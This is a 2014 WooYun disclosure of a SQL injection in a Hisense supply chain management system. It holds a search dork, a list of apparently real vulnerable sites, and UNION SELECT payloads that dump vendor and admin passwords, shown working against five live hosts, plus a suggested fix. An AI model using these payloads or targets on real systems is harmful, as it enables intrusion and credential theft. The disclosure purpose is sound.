当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071715

漏洞标题:某商业链系统SQL注入漏洞二

相关厂商:Cncert国家互联网应急中心

漏洞作者: sex is not show

提交时间:2014-08-11 11:41

修复时间:2014-11-09 11:42

公开时间:2014-11-09 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-11: 细节已通知厂商并且等待厂商处理中
2014-08-16: 厂商已经确认,细节仅向厂商公开
2014-08-19: 细节向第三方安全合作伙伴开放
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-09: 细节向公众公开

简要描述:

我看到商业链上首页了,我发可以上首页么?

详细说明:

开发公司:青岛海信智能商用股份有限公司(http://www.hisense.com)
程序名称:供应链管理系统
漏洞类型:SQL注入
漏洞文件:/ScmLy/SelectMessageV.aspx
漏洞参数:tb_LyTimeL
是否需要登录:需要普通用户权限(可以随意注册用户,so...)
关键字:海信供应链管理系统/供应链管理系统. Ver:3.5.5 / inurl:/ScmUser/login.aspx
影响用户:几十家吧

1.jpg


搜集一些用户列表:

中泽商业物流供应链管理系统
http://123.235.56.106:8080/(S(ygruigzv3w5c2f55zlxcmk45))/scmsup/Default.aspx
中山市及时便利连锁有限公司-供应链管理系统
http://125.92.248.29:8888/(S(l4b0tw45zawtsk55atajfn55))/scmsup/Default.aspx
海宁华联供应链管理系统
http://218.75.63.158:8001/scmsup/Default.aspx
泰安凌云经贸有限公司供应链管理系统
http://221.1.178.18:8080/scmsup/Default.aspx
招远金都百货供应链管理系统
http://221.214.208.51/(S(zgka40n2fydrmibazhstkd55))/scmsup/Default.aspx
鑫利精品生活超市供应链管理系统
http://shangjia.jqxlsc.com/scmsup/Default.aspx
东营商业大厦供应链管理系统
http://58.57.130.134/scmsup/Default.aspx
青 岛 海 信 广 场
http://sup.hisense-plaza.com/scmsup/Default.aspx
星力百货供应链管理系统
http://scm.xinglico.com:8888/scmsup/Default.aspx
利客来供应链管理系统
http://124.129.157.189:90/scmsup/Default.aspx
http://60.209.125.94:8123/scmsup/Default.aspx
乌海市通用时代广场供应链管理系统
http://120.193.178.207/(S(jzibo545a1zgogq1rwodti45))/scmsup/Default.aspx
青岛会生活商贸有限公司供应链管理系统
http://supply.granvida.cn/(S(axxlwr45iexaqk55abp2wm45))/scmsup/Default.aspx
山东圣豪供应链管理系统
http://119.185.1.162:8088/(S(c5grpx55mnz0sp45hrne0p55))/scmsup/Default.aspx
富万家商贸有限责任公司供应链管理系统
http://114.135.67.38:81/(S(k3bqrr55hmivwz4505f2j145))/scmsup/Default.aspx


利用方法:

1.先通过/ScmAprov/InstQzVendor.aspx这个页面添加一个用户,这里添加的用户是无需审    核就可以登录的,构成了后面的注入条件。
2.注册好后,到/scmsup/Default.aspx这个页面登录。
3.访问【留言】--【查看留言】功能,输入查询语句达到注入效果。


实例演示:
1.
①先注册用户
http://124.129.157.189:90//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://124.129.157.189:90/scmsup/Default.aspx

1.jpg


③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--

1.jpg


1.jpg


啦啦啦,直接读出管理员用户数据了、
2.
①先注册用户
http://218.75.63.158:8001//ScmSup/InstVendor.aspx
我注册的tested/tested
②登录
http://218.75.63.158:8001/scmsup/Default.aspx

1.jpg


③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--

1.jpg


1.jpg


啦啦啦,直接读出管理员用户数据了、
3.
①先注册用户
http://122.225.53.6//ScmSup/InstVendor.aspx
我注册的tested/tested
②登录
http://122.225.53.6/scmsup/Default.aspx

1.jpg


③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--

1.jpg


1.jpg


啦啦啦,直接读出管理员用户数据了、

漏洞证明:

4.
①先注册用户
http://119.187.148.69:7171//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://119.187.148.69:7171/scmsup/Default.aspx

1.jpg


③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--

1.jpg


1.jpg


啦啦啦,直接读出管理员用户数据了、
5.
①先注册用户
http://sup.hisense-plaza.com//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://sup.hisense-plaza.com/scmsup/default0.aspx

1.jpg


③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--

1.jpg


1.jpg


啦啦啦,直接读出管理员用户数据了、

修复方案:

供应商注册加审核
后台查询参数过滤

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-16 08:33

厂商回复:

最新状态:

2014-08-20:补充处置情况:CNVD确认并复现所述情况,已经由CNVD按以往联系渠道邮件向软件生产厂商通报。


漏洞评价:

评论